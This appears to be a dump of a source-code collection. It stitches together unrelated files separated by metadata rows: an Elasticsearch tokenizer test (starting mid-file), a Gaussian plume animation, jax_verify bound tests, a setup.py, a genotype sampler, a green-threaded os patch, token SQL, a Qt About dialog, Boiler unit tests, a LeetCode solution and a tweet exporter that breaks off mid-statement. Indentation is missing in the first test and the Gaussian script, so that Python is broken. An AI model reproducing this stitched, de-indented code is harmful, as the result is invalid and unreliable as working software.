'text_b': "クライアントは Firefox に入ってますし、サーバは OpenSSH "
"に組み込まれていますので、別途ソフトウェアのインストールは"
"不要です。",
})
# Simple Query (and wait commit) (OMG)
for i in range(10):
try:
result = DummyESDocumentPresetIndex.objects.get(
{"term": {"key": "doc2"}})
break
except DummyESDocumentPresetIndex.DoesNotExist:
time.sleep(0.3)
continue
self.assertIn('不要です。', result.text_b)
def test_index_kuromoji_1(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_k": "起動"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc2')
def test_index_kuromoji_2(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_k": "ネットワーク"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc1')
def test_index_bigram_1(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_b": "ソフトウ"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc2')
def test_index_bigram_2(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_b": "視ツ"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc1')
def test_index_bigram_3(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_b": "Firefoxサーバ"}})
list(results)
# r = list(results)
        # len(r) should be 0 here, but it is not
        # needs a better understanding of Elasticsearch
# self.assertEqual(len(r), 0)
def tearDown(self):
DummyESDocumentPresetIndex.index.delete()
| bsd-3-clause | -8,059,776,069,640,500,000 | 33.5 | 79 | 0.546944 | false | 3.048015 | true | false | false |
spatchcock/models | gaussian_with_advection_and_decay.py | 1 | 1810 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 31 10:45:25 2016
@author: spatchcock
"""
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.animation as animation
import matplotlib.colors as colors
#%%
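# two_d_gauss() evaluates a separable 2-D Gaussian of total mass M on the grid:
#   g(x, y) = M / (2*pi*sx*sy) * exp(-((x - mx)**2 / (2*sx**2) + (y - my)**2 / (2*sy**2)))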
def two_d_gauss(x, y, M, meanx, meany, stdevx, stdevy):
g = np.zeros((np.size(x), np.size(y)))
for i in np.arange(0, np.size(x), 1):
for j in np.arange(0, np.size(y), 1):
g[i][j] = (M/(2*np.pi*stdevx*stdevy)) * np.exp(-((((x[i] - meanx)**2.0)/(2.0*(stdevx**2.0))) + (((y[j] - meany)**2.0)/(2.0*(stdevy**2.0)))))
return g
### Invoke model timestep and replot data on each iteration
#def animate(i):
# data = two_d_gauss(x, y, M, meanx[i], meany[i], stdevx[i], stdevy[i])
#
# im.set_array(np.ravel(data))
# step_text.set_text('iter: %.1f' % i)
# plt.draw()
#%%
t = np.arange(1,1000,1)
domain_range = 100
x = np.arange(-domain_range/2,domain_range/2,1)
y = np.arange(-domain_range/2,domain_range/2,1)
u = 0.3*np.sin(2*np.pi*t/50)
v = 0.0
D_x = 0.5
D_y = 0.1
startx = 0.0
starty = 0.0
M = 1000
meanx = startx + u*t
stdevx = np.sqrt(2.0*D_x*t)
meany = starty + v*t
stdevy = np.sqrt(2.0*D_y*t)
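# As coded here, advection displaces the plume centre by u*t in x (and v*t in y),
# while diffusion widens it following variance = 2*D*t, i.e. stdev = sqrt(2*D*t).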
#%%
X, Y = np.meshgrid(x, y)
Z = two_d_gauss(x, y, M, startx, starty, stdevx[0], stdevy[0])
Z_max = np.max(Z)
norm=colors.Normalize(vmin=0.,vmax=Z_max/10.0)
fig = plt.figure()
ims = []
ims.append((plt.pcolor(X,Y,Z, cmap='Reds', norm=norm),))
for ts in np.arange(2,100,1):
Z = two_d_gauss(x, y, M, meanx[ts], meany[ts], stdevx[ts], stdevy[ts])
ims.append((plt.pcolor(X,Y,Z, cmap='Reds', norm=norm),))
#%%
### Plot ###
im_ani = animation.ArtistAnimation(fig, ims, interval=50, repeat_delay=500, blit=True)
#im_ani.save('im.mp4', metadata={'artist':'Guido'})
plt.show()
| unlicense | -1,696,145,834,400,665,300 | 20.807229 | 152 | 0.600552 | false | 2.218137 | false | false | false |
deepmind/jax_verify | jax_verify/tests/ibp_test.py | 1 | 4160 | # coding=utf-8
# Copyright 2020 The jax_verify Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Interval Bound Propagation."""
import functools
from absl.testing import absltest
from absl.testing import parameterized
import haiku as hk
import jax
import jax.numpy as jnp
import jax_verify
class IBPTest(parameterized.TestCase):
def assertArrayAlmostEqual(self, lhs, rhs):
diff = jnp.abs(lhs - rhs).max()
self.assertAlmostEqual(diff, 0.)
def test_linear_ibp(self):
def linear_model(inp):
return hk.Linear(1)(inp)
z = jnp.array([[1., 2., 3.]])
params = {'linear':
{'w': jnp.ones((3, 1), dtype=jnp.float32),
'b': jnp.array([2.])}}
fun = functools.partial(
hk.without_apply_rng(hk.transform(linear_model, apply_rng=True)).apply,
params)
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(fun, input_bounds)
self.assertAlmostEqual(5., output_bounds.lower)
self.assertAlmostEqual(11., output_bounds.upper)
def test_conv1d_ibp(self):
def conv1d_model(inp):
return hk.Conv1D(output_channels=1, kernel_shape=2,
padding='VALID', stride=1, with_bias=True)(inp)
z = jnp.array([3., 4.])
z = jnp.reshape(z, [1, 2, 1])
params = {'conv1_d':
{'w': jnp.ones((2, 1, 1), dtype=jnp.float32),
'b': jnp.array([2.])}}
fun = functools.partial(
hk.without_apply_rng(hk.transform(conv1d_model, apply_rng=True)).apply,
params)
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(fun, input_bounds)
self.assertAlmostEqual(7., output_bounds.lower)
self.assertAlmostEqual(11., output_bounds.upper)
def test_conv2d_ibp(self):
def conv2d_model(inp):
return hk.Conv2D(output_channels=1, kernel_shape=(2, 2),
padding='VALID', stride=1, with_bias=True)(inp)
z = jnp.array([1., 2., 3., 4.])
z = jnp.reshape(z, [1, 2, 2, 1])
params = {'conv2_d':
{'w': jnp.ones((2, 2, 1, 1), dtype=jnp.float32),
'b': jnp.array([2.])}}
fun = functools.partial(
hk.without_apply_rng(hk.transform(conv2d_model, apply_rng=True)).apply,
params)
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(fun, input_bounds)
self.assertAlmostEqual(8., output_bounds.lower)
self.assertAlmostEqual(16., output_bounds.upper)
def test_relu_ibp(self):
def relu_model(inp):
return jax.nn.relu(inp)
z = jnp.array([[-2., 3.]])
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(relu_model,
input_bounds)
self.assertArrayAlmostEqual(jnp.array([[0., 2.]]), output_bounds.lower)
self.assertArrayAlmostEqual(jnp.array([[0., 4.]]), output_bounds.upper)
def test_softplus_ibp(self):
def softplus_model(inp):
return jax.nn.softplus(inp)
z = jnp.array([[-2., 3.]])
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(softplus_model,
input_bounds)
self.assertArrayAlmostEqual(jnp.logaddexp(z - 1., 0),
output_bounds.lower)
self.assertArrayAlmostEqual(jnp.logaddexp(z + 1., 0),
output_bounds.upper)
if __name__ == '__main__':
absltest.main()
| apache-2.0 | -1,775,091,613,955,423,200 | 32.821138 | 79 | 0.621635 | false | 3.360258 | true | false | false |
pradeepchhetri/pyvultr | setup.py | 1 | 1297 | #!/usr/bin/env python
from pyvultr.meta import (__version__, __description__, __author__,
__author_email__, __url__)
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
packages = [
'pyvultr',
'pyvultr.cmd',
'pyvultr.lib'
]
requires = open("requirements/base.txt").read().split()
setup(
name='pyvultr',
version=__version__,
description=__description__,
author=__author__,
author_email=__author_email__,
url=__url__,
packages=packages,
package_data={'': ['LICENSE']},
package_dir={'pyvultr': 'pyvultr'},
include_package_data=True,
install_requires=requires,
license=open('LICENSE').read(),
zip_safe=False,
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: PyPy',
),
)
| unlicense | -4,166,431,794,577,748,500 | 27.822222 | 67 | 0.58751 | false | 4.02795 | false | true | false |
tiagoantao/AgeStructureNe | sampleLoci.py | 1 | 1346 | from __future__ import print_function
from sys import stdin, argv, exit
import bz2
import random
if len(argv) not in [4, 5]:
print("python %s genFile loci maxLoci [startLoci]" % (argv[0],))
exit(-1)
genFile = argv[1]
nloci = int(argv[2])
maxLoci = int(argv[3])
startLoci = int(argv[4]) if len(argv) == 5 else 0
loci = [x + startLoci for x in random.sample(list(range(maxLoci)), nloci)]
l = stdin.readline()
gens = []
currGen = 0
# get individuals per generation
indivs = set()
while l != "":
l = l.rstrip()
point = l.find(" ")
gen = l[:point]
genIndivs = eval(l[point:])
indivs = indivs.union(genIndivs)
gens.append(genIndivs)
l = stdin.readline()
# get genetic data
f = bz2.open(genFile, 'rt')
l = f.readline()
genetics = {}
while l != "":
toks = l.rstrip().split(" ")
id = int(float(toks[0]))
gen = int(float(toks[1]))
myAlleles = toks[2:]
if id in indivs:
myloci = []
for locus in loci:
myloci.append(myAlleles[locus])
genetics[id] = myloci
l = f.readline()
f.close()
# print >>stderr, genetics.keys()
# dump genepop file
print("lala land")
for locus in loci:
print("l" + str(locus))
for indivs in gens:
print("Pop")
for indiv in indivs:
print("i" + str(indiv) + ",", end=' ')
print(" ".join(genetics[indiv]))
| agpl-3.0 | -2,048,678,567,316,271,600 | 21.433333 | 74 | 0.59584 | false | 2.758197 | false | false | false |
inercia/evy | evy/patched/os.py | 1 | 3820 | #
# Evy - a concurrent networking library for Python
#
# Unless otherwise noted, the files in Evy are under the following MIT license:
#
# Copyright (c) 2012, Alvaro Saurin
# Copyright (c) 2008-2010, Eventlet Contributors (see AUTHORS)
# Copyright (c) 2007-2010, Linden Research, Inc.
# Copyright (c) 2005-2006, Bob Ippolito
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
os_orig = __import__("os")
import errno
socket = __import__("socket")
from evy.support import get_errno
from evy.io.pipes import GreenPipe
from evy.green import threads as greenthread
from evy import hubs
from evy.patcher import slurp_properties
__all__ = os_orig.__all__
__patched__ = ['fdopen', 'read', 'write', 'wait', 'waitpid']
slurp_properties(os_orig, globals(),
ignore = __patched__, srckeys = dir(os_orig))
def fdopen (fd, *args, **kw):
"""
fdopen(fd [, mode='r' [, bufsize]]) -> file_object
Return an open file object connected to a file descriptor."""
if not isinstance(fd, int):
raise TypeError('fd should be int, not %r' % fd)
try:
return GreenPipe(fd, *args, **kw)
except IOError, e:
raise OSError(*e.args)
__original_read__ = os_orig.read
def read (fd, n):
"""
read(fd, buffersize) -> string
Read a file descriptor."""
while True:
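        # A read that would block raises EAGAIN; instead of re-raising we fall
        # through to trampoline(), which suspends this green thread until the fd
        # is readable again, and then the loop retries the raw read.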
try:
return __original_read__(fd, n)
except (OSError, IOError), e:
if get_errno(e) != errno.EAGAIN:
raise
except socket.error, e:
if get_errno(e) == errno.EPIPE:
return ''
raise
hubs.trampoline(fd, read = True)
__original_write__ = os_orig.write
def write (fd, st):
"""
write(fd, string) -> byteswritten
Write a string to a file descriptor.
"""
while True:
try:
return __original_write__(fd, st)
except (OSError, IOError), e:
if get_errno(e) != errno.EAGAIN:
raise
except socket.error, e:
if get_errno(e) != errno.EPIPE:
raise
hubs.trampoline(fd, write = True)
def wait ():
"""
wait() -> (pid, status)
Wait for completion of a child process.
"""
return waitpid(0, 0)
__original_waitpid__ = os_orig.waitpid
def waitpid (pid, options):
"""
waitpid(...)
waitpid(pid, options) -> (pid, status)
Wait for completion of a given child process.
"""
if options & os_orig.WNOHANG != 0:
return __original_waitpid__(pid, options)
else:
new_options = options | os_orig.WNOHANG
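        # Emulate a blocking waitpid without blocking the hub: poll the child with
        # WNOHANG and yield to other green threads between attempts.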
while True:
rpid, status = __original_waitpid__(pid, new_options)
if rpid and status >= 0:
return rpid, status
greenthread.sleep(0.01)
# TODO: open
| mit | 8,417,243,514,126,850,000 | 29.07874 | 79 | 0.631675 | false | 3.752456 | false | false | false |
Relrin/aiorest-ws | aiorest_ws/auth/token/utils.py | 1 | 1071 | # -*- coding: utf-8 -*-
"""
Functions and constants that can be used to work with Token models.
"""
SQL_CREATE_TOKEN_TABLE = """
CREATE TABLE IF NOT EXISTS aiorest_auth_token
(id INTEGER PRIMARY KEY NOT NULL,
name CHAR(64) NOT NULL, -- name of key (admin, api, etc.)
token TEXT NOT NULL,
created DATETIME DEFAULT CURRENT_TIMESTAMP NOT NULL,
     expired DATETIME DEFAULT NULL, -- for some tokens it isn't necessary
     user_id INTEGER NOT NULL REFERENCES aiorest_auth_user(id) -- referenced by the queries below
);
"""
SQL_TOKEN_GET = """
SELECT `id`, `name`, `token`, `created`, `expired`, `user_id`
FROM aiorest_auth_token
WHERE token=?;
"""
SQL_TOKEN_GET_BY_TOKEN_USERNAME = """
SELECT aiorest_auth_token.id, `name`, `token`, `created`,
`expired`, `user_id`
FROM aiorest_auth_token
INNER JOIN aiorest_auth_user
ON aiorest_auth_token.user_id=aiorest_auth_user.id
WHERE name=? AND username=?;
"""
SQL_TOKEN_ADD = """
INSERT INTO aiorest_auth_token (`name`, `token`, `expired`, `user_id`)
VALUES (?, ?, ?, ?);
"""
TOKEN_MODEL_FIELDS = ('id', 'name', 'token', 'created', 'expired', 'user_id')
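# Minimal usage sketch (an assumption, not part of this module): the statements
# above use "?" placeholders, so with the standard sqlite3 driver one could do
#
#   import sqlite3
#   conn = sqlite3.connect('auth.db')
#   conn.execute(SQL_CREATE_TOKEN_TABLE)
#   row = conn.execute(SQL_TOKEN_GET, (raw_token,)).fetchone()
#   token = dict(zip(TOKEN_MODEL_FIELDS, row)) if row else None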
| bsd-3-clause | -4,285,003,790,112,530,400 | 32.46875 | 77 | 0.633053 | false | 3.275229 | false | false | false |
FrancescoCeruti/linux-show-player | lisp/ui/about.py | 2 | 6223 | # -*- coding: utf-8 -*-
#
# This file is part of Linux Show Player
#
# Copyright 2012-2016 Francesco Ceruti <[email protected]>
#
# Linux Show Player is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Linux Show Player is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Linux Show Player. If not, see <http://www.gnu.org/licenses/>
from collections import OrderedDict
from PyQt5 import QtCore
from PyQt5.QtCore import Qt, QT_TRANSLATE_NOOP
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QDialog, QGridLayout, QLabel, QWidget, QTabWidget, \
QTextBrowser, QDialogButtonBox
import lisp
from lisp.ui.ui_utils import translate
class About(QDialog):
LICENSE = '''
<p>
Linux Show Player is free software: you can redistribute it and/or<br />
modify it under the terms of the GNU General Public License as published by<br />
the Free Software Foundation, either version 3 of the License, or<br />
(at your option) any later version.<br />
<br />
Linux Show Player is distributed in the hope that it will be useful,<br />
but WITHOUT ANY WARRANTY; without even the implied warranty of<br />
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<br />
GNU General Public License for more details.
</p>
'''
DESCRIPTION = QT_TRANSLATE_NOOP('AboutDialog',
'Linux Show Player is a cue-player designed for stage productions.')
WEB_SITE = 'http://linux-show-player.sourceforge.net'
USER_GROUP = 'http://groups.google.com/group/linux-show-player---users'
SOURCE_CODE = 'https://github.com/FrancescoCeruti/linux-show-player'
CONTRIBUTORS = OrderedDict({
QT_TRANSLATE_NOOP('About', 'Authors'): [
('Francesco Ceruti', '[email protected]')
],
QT_TRANSLATE_NOOP('About', 'Contributors'): [
('Yinameah', 'https://github.com/Yinameah'),
('nodiscc', 'https://github.com/nodiscc'),
('Thomas Achtner', '[email protected]')
],
QT_TRANSLATE_NOOP('About', 'Translators'): [
('aroomthedoomed', 'https://github.com/aroomthedoomed'),
('fri', 'https://www.transifex.com/user/profile/fri'),
('Luis García-Tornel', '[email protected]'),
('miharix', 'https://github.com/miharix'),
('Olivier Humbert - français', '[email protected]')
],
})
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self.setWindowTitle(translate('About', 'About Linux Show Player'))
self.setMaximumSize(500, 420)
self.setMinimumSize(500, 420)
self.resize(500, 420)
self.setLayout(QGridLayout())
self.iconLabel = QLabel(self)
self.iconLabel.setPixmap(
QIcon.fromTheme('linux-show-player').pixmap(100, 100))
self.layout().addWidget(self.iconLabel, 0, 0)
self.shortInfo = QLabel(self)
self.shortInfo.setAlignment(Qt.AlignCenter)
self.shortInfo.setText('<h2>Linux Show Player {0}</h2>'
'Copyright © Francesco Ceruti'
.format(str(lisp.__version__)))
self.layout().addWidget(self.shortInfo, 0, 1)
self.layout().addWidget(QWidget(), 1, 0, 1, 2)
# Information tabs
self.tabWidget = QTabWidget(self)
self.layout().addWidget(self.tabWidget, 2, 0, 1, 2)
self.info = QTextBrowser(self)
self.info.setOpenExternalLinks(True)
self.info.setHtml('''
<center><br />{0}<br /><br />
<a href="{1}">{2}</a><br />
<a href="{3}">{4}</a><br />
<a href="{5}">{6}</a><br /><center>'''.format(
translate('AboutDialog', self.DESCRIPTION),
self.WEB_SITE, translate('AboutDialog', 'Web site'),
self.USER_GROUP, translate('AboutDialog', 'Users group'),
self.SOURCE_CODE, translate('AboutDialog', 'Source code'))
)
self.tabWidget.addTab(self.info, translate('AboutDialog', 'Info'))
self.license = QTextBrowser(self)
self.license.setOpenExternalLinks(True)
self.license.setHtml(self.LICENSE)
self.tabWidget.addTab(self.license, translate('AboutDialog', 'License'))
self.contributors = QTextBrowser(self)
self.contributors.setOpenExternalLinks(True)
self.contributors.setHtml(self.__contributors())
self.tabWidget.addTab(self.contributors,
translate('AboutDialog', 'Contributors'))
# Ok button
self.buttons = QDialogButtonBox(QDialogButtonBox.Ok)
self.buttons.accepted.connect(self.accept)
self.layout().addWidget(self.buttons, 3, 1)
self.layout().setColumnStretch(0, 1)
self.layout().setColumnStretch(1, 3)
self.layout().setRowStretch(0, 6)
self.layout().setRowStretch(1, 1)
self.layout().setRowStretch(2, 16)
self.layout().setRowStretch(3, 3)
self.buttons.setFocus()
def __contributors(self):
text = ''
for section, people in self.CONTRIBUTORS.items():
text += '<u><b>{0}:</b></u><br />'.format(translate('About',
section))
for person in people:
text += person[0]
if '://' in person[1]:
text += ' - <a href="{0}">{1}</a>'.format(
person[1], person[1][person[1].index('://')+3:])
elif person[1]:
text += ' - <a href="mailto:{0}">{0}</a>'.format(person[1])
text += '<br />'
text += '<br />'
return text
| gpl-3.0 | 9,202,695,973,476,849,000 | 38.367089 | 85 | 0.604823 | false | 3.751508 | false | false | false |
mnesvold/Boil | test-boiler.py | 1 | 7629 | import os
import shutil
import sys
import tempfile
import unittest
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import boiler
class BoilerTests(unittest.TestCase):
def setUp(self):
self.boiler = boiler.Boiler()
self.temp_dirs = []
def tearDown(self):
for temp_dir in self.temp_dirs:
shutil.rmtree(temp_dir)
def _mkdtemp(self):
temp_dir = tempfile.mkdtemp(prefix='test-temp-', dir=os.curdir)
self.temp_dirs.append(temp_dir)
return temp_dir
def _write_file(self, filename, contents):
with open(filename, 'w') as f:
f.write(contents)
def _read_file(self, filename):
with open(filename) as f:
return f.read()
def test_templates_dir_default(self):
"""
A Boiler object should expose a `templates_dir` variable which
is a string and defaults to the absolute path of a `.boiler` folder
in the user's home directory.
"""
expected_dir = os.path.abspath(os.path.expanduser('~/.boiler'))
actual_dir = self.boiler.templates_dir
self.assertEqual(expected_dir, actual_dir)
def test_templates_dir_cli_arg(self):
"""
A Boiler object should expose a 'parse_arguments' method
which accepts a `--templates-dir=DIR` argument which sets the Boiler's
`templates_dir` variable.
"""
self.boiler.parse_arguments(['--templates-dir=/foo/bar'])
expected_dir = '/foo/bar'
actual_dir = self.boiler.templates_dir
self.assertEqual(expected_dir, actual_dir)
def test_output_dir_default(self):
"""
A Boiler object should expose an `output_dir` variable which
is a string and defaults to the current directory.
"""
expected_dir = os.curdir
actual_dir = self.boiler.output_dir
self.assertEqual(expected_dir, actual_dir)
def test_output_dir_cli_arg(self):
"""
A Boiler object should expose a 'parse_arguments' method
which accepts a `--output-dir=DIR` argument which sets the Boiler's
`output_dir` variable.
"""
self.boiler.parse_arguments(['--output-dir=../qux'])
expected_dir = '../qux'
actual_dir = self.boiler.output_dir
self.assertEqual(expected_dir, actual_dir)
def test_apply_boilerplate(self):
"""
A Boiler object should expose an `apply_boilerplate` method which
accepts a template name and copies the like-named file from its current
templates_dir folder into its current output_dir folder.
"""
templates_dir = self.boiler.templates_dir = self._mkdtemp()
output_dir = self.boiler.output_dir = self._mkdtemp()
template_name = 'foo.tmpl'
template_path = os.path.join(templates_dir, template_name)
output_path = os.path.join(output_dir, template_name)
self._write_file(template_path, 'Hello, world!')
self.boiler.apply_boilerplate(template_name)
output = self._read_file(output_path)
self.assertEqual(output, 'Hello, world!')
def test_cli_arg_parse_ok(self):
"""
A Boiler object should expose a `parse_arguments` method which returns
True when the arguments parse successfully.
"""
self.assertTrue(self.boiler.parse_arguments([]))
self.assertTrue(self.boiler.parse_arguments(['--templates-dir=/']))
self.assertTrue(self.boiler.parse_arguments(['--output-dir=.']))
def test_cli_arg_parse_fail(self):
"""
A Boiler object should expose a `parse_arguments` method which returns
False if any argument fails to parse.
"""
self.assertFalse(self.boiler.parse_arguments(['--fail']))
self.assertFalse(self.boiler.parse_arguments([
'--templates-dir=/', '--nope']))
def test_stderr(self):
"""
A Boiler object should expose a `stderr` variable which defaults to
`sys.stderr`.
"""
self.assertIs(self.boiler.stderr, sys.stderr)
def test_usage(self):
"""
A Boiler object should expose a `print_usage` method which prints
information to the Boiler's `stderr` variable, then raises 'SystemExit'.
"""
stderr = self.boiler.stderr = StringIO()
with self.assertRaises(SystemExit):
self.boiler.print_usage()
self.assertNotEqual(stderr.getvalue(), '')
def test_template_list_default(self):
"""
A Boiler object should expose a `template_list` variable which defaults
to an empty list.
"""
self.assertEqual(self.boiler.template_list, [])
def test_template_list_cli_arg(self):
"""
A Boiler object should expose a `parse_arguments` method which accepts
positional arguments and uses them to populate the Boiler's
`template_list` variable.
"""
self.boiler.parse_arguments(['foo.tmpl', 'bar', 'bam.qux'])
expected = ['foo.tmpl', 'bar', 'bam.qux']
actual = self.boiler.template_list
self.assertSequenceEqual(expected, actual)
def test_main_ok(self):
"""
A Boiler object should expose a `main` method which forwards its
argument to parse_arguments, then (if parse_arguments returns True)
calls apply_boilerplate with each element of the `template_list`
variable.
"""
parse_argument_calls = []
apply_calls = []
def mock_parse_arguments(args):
self.assertSequenceEqual([], parse_argument_calls)
parse_argument_calls.append(args)
self.boiler.template_list = ['blue', 'red', 'green']
return True
def mock_apply(arg):
apply_calls.append(arg)
self.boiler.parse_arguments = mock_parse_arguments
self.boiler.apply_boilerplate = mock_apply
self.boiler.main(['--foo', '--bar=bam', 'hallo'])
self.assertSequenceEqual([['--foo', '--bar=bam', 'hallo']],
parse_argument_calls)
self.assertSequenceEqual(['blue', 'red', 'green'], apply_calls)
def test_main_empty(self):
"""
A Boiler object should expose a `main` method which forwards its
argument to parse_arguments, then (if template_list is empty)
calls print_usage.
"""
usage_calls = []
def mock_parse_arguments(args):
self.boiler.template_list = []
return True
def mock_usage():
usage_calls.append(0)
self.boiler.parse_arguments = mock_parse_arguments
self.boiler.print_usage = mock_usage
self.boiler.main([])
self.assertSequenceEqual([0], usage_calls)
def test_main_fail(self):
"""
A Boiler object should expose a `main` method which forwards its
argument to parse_arguments, then (if parse_arguments returns False)
calls print_usage.
"""
class MockSystemExit(Exception):
pass
usage_calls = []
def mock_parse_arguments(args):
self.boiler.template_list = ['foo']
return False
def mock_usage():
usage_calls.append(0)
raise MockSystemExit
self.boiler.parse_arguments = mock_parse_arguments
self.boiler.print_usage = mock_usage
with self.assertRaises(MockSystemExit):
self.boiler.main([])
self.assertSequenceEqual([0], usage_calls)
if __name__ == '__main__':
unittest.main()
| mit | 153,866,880,273,420,260 | 35.328571 | 80 | 0.610434 | false | 4.128247 | true | false | false |
ckclark/leetcode | py/insert-delete-getrandom-o1-duplicates-allowed.py | 1 | 1787 | from collections import Counter
import random
class RandomizedCollection(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.counter = Counter()
self.redundant = Counter()
self.array = []
def insert(self, val):
"""
Inserts a value to the collection. Returns true if the collection did not already contain the specified element.
:type val: int
:rtype: bool
"""
self.counter[val] += 1
if self.redundant[val] == 0:
self.array.append(val)
else:
self.redundant[val] -= 1
return self.counter[val] == 1
def remove(self, val):
"""
Removes a value from the collection. Returns true if the collection contained the specified element.
:type val: int
:rtype: bool
"""
ret = False
if self.counter[val]:
ret = True
self.counter[val] -= 1
self.redundant[val] += 1
return ret
def getRandom(self):
"""
Get a random element from the collection.
:rtype: int
"""
while True:
idx = random.randint(0, len(self.array) - 1)
v = self.array[idx]
if self.counter[v] and (self.redundant[v] == 0 or random.random() * (self.counter[v] + self.redundant[v]) < self.counter[v]):
break
else:
self.array[idx] = self.array[-1]
self.array.pop()
self.redundant[v] -= 1
return v
# Your RandomizedCollection object will be instantiated and called as such:
# obj = RandomizedCollection()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
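# Minimal self-check (hypothetical values), runnable as a script; it only
# exercises the class defined above and is not part of the LeetCode template.
if __name__ == '__main__':
    demo = RandomizedCollection()
    assert demo.insert(1)          # True: 1 was not present before
    assert not demo.insert(1)      # False: 1 was already present
    assert demo.remove(1)          # True: one copy of 1 removed
    assert demo.getRandom() == 1   # only 1 remains in the collection, so it must be drawn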
| apache-2.0 | 6,901,476,797,109,974,000 | 27.365079 | 137 | 0.543928 | false | 4.127021 | false | false | false |
pizzaro13/FakeNewsDetector | Exporter.py | 2 | 2515 | # -*- coding: utf-8 -*-
import sys,getopt,got,datetime,codecs
def main(argv):
if len(argv) == 0:
print 'You must pass some parameters. Use \"-h\" to help.'
return
if len(argv) == 1 and argv[0] == '-h':
		print """\nTo use this script, you can pass the following parameters:
            username: Username of a specific twitter account (without @)
            since: The lower bound date (yyyy-mm-dd)
            until: The upper bound date (yyyy-mm-dd)
querysearch: A query text to be matched
maxtweets: The maximum number of tweets to retrieve
\nExamples:
# Example 1 - Get tweets by username [barackobama]
python Exporter.py --username "barackobama" --maxtweets 1\n
# Example 2 - Get tweets by query search [europe refugees]
python Exporter.py --querysearch "europe refugees" --maxtweets 1\n
# Example 3 - Get tweets by username and bound dates [barackobama, '2015-09-10', '2015-09-12']
python Exporter.py --username "barackobama" --since 2015-09-10 --until 2015-09-12 --maxtweets 1\n
# Example 4 - Get the last 10 top tweets by username
python Exporter.py --username "barackobama" --maxtweets 10 --toptweets\n"""
return
try:
opts, args = getopt.getopt(argv, "", ("username=", "since=", "until=", "querysearch=", "toptweets", "maxtweets="))
tweetCriteria = got.manager.TweetCriteria()
for opt,arg in opts:
if opt == '--username':
tweetCriteria.username = arg
elif opt == '--since':
tweetCriteria.since = arg
elif opt == '--until':
tweetCriteria.until = arg
elif opt == '--querysearch':
tweetCriteria.querySearch = arg
elif opt == '--toptweets':
tweetCriteria.topTweets = True
elif opt == '--maxtweets':
tweetCriteria.maxTweets = int(arg)
outputFile = codecs.open("output_got.csv", "w+", "utf-8")
outputFile.write('username;date;retweets;favorites;text;geo;mentions;hashtags;id;permalink')
print 'Searching...\n'
def receiveBuffer(tweets):
for t in tweets:
outputFile.write(('\n%s;%s;%d;%d;"%s";%s;%s;%s;"%s";%s' % (t.username, t.date.strftime("%Y-%m-%d %H:%M"), t.retweets, t.favorites, t.text, t.geo, t.mentions, t.hashtags, t.id, t.permalink)))
outputFile.flush();
print 'More %d saved on file...\n' % len(tweets)
got.manager.TweetManager.getTweets(tweetCriteria, receiveBuffer)
	except getopt.GetoptError as err:
